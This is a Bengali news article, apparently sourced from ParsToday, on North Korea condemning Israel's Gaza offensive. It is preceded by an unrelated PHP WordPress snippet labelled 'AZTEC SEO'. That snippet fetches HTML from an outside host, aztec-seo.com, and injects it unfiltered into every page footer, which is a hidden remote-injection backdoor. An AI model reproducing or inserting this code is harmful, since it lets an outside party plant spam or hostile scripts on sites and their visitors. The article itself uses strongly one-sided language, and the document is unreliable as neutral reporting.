/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ফিলিস্তিনের অবরুদ্ধ গাজা উপত্যকার উপর ইহুদিবাদী ইসরাইলের সামরিক আগ্রাসনের নিন্দা জানিয়ে উত্তর কোরিয়া বলেছে, তেল আবিব শিশুদের ওপর গণহত্যা চালাচ্ছে এবং ইসরাইলের বেপরোয়া সন্ত্রাসবাদ বিশ্ববাসীর সহ্য করা উচিত নয়।
আজ (বুধবার) উত্তর কোরিয়ার পররাষ্ট্র মন্ত্রণালয় থেকে প্রকাশিত এক বিবৃতিতে এসব কথা বলা হয়েছে। বিবৃতিতে বলা হয়, “একথা বলতে দ্বিধা নেই যে, পুরো গাজা উপত্যকাকে ইসরাইল কসাইখানায় পরিণত করেছে। সেখানে ইসরাইলি বাহিনী শিশু হত্যা করছে। ইসরাইলের এই ভয়াবহ শিশু হত্যাকাণ্ড ভবিষ্যৎ মানবপ্রজাতির জন্য বিরাট চ্যালেঞ্জ হয়ে দাঁড়িয়েছে এবং এটি মানবতাবিরোধী অপরাধ।”
গত ১০ মে ইসরাইল অবরুদ্ধ গাজা উপত্যকার ওপর বর্বর আগ্রাসন চালায়। টানা ১১ দিনের বোমা ও গোলাবর্ষণে গাজার ২৬০ জন নাগরিক শহীদ হন। এর মধ্যে ৬৬টি শিশু রয়েছে। এছাড়া, ইসরাইলি বিমান হামলায় গাজা উপত্যকায় এক হাজারের বেশি ঘরবাড়ি ও ভবন ধ্বংস হয়। জবাবে গাজার প্রতিরোধ আন্দোলন হামাস ও ইসলামি জিহাদ আন্দোলন চার হাজারে বেশি রকেট ছোঁড়ে। এক পর্যায়ে বাধ্য হয়ে ইসরাইল হামাসের সঙ্গে যুদ্ধবিরতি করে। সূত্র : পার্সটুডে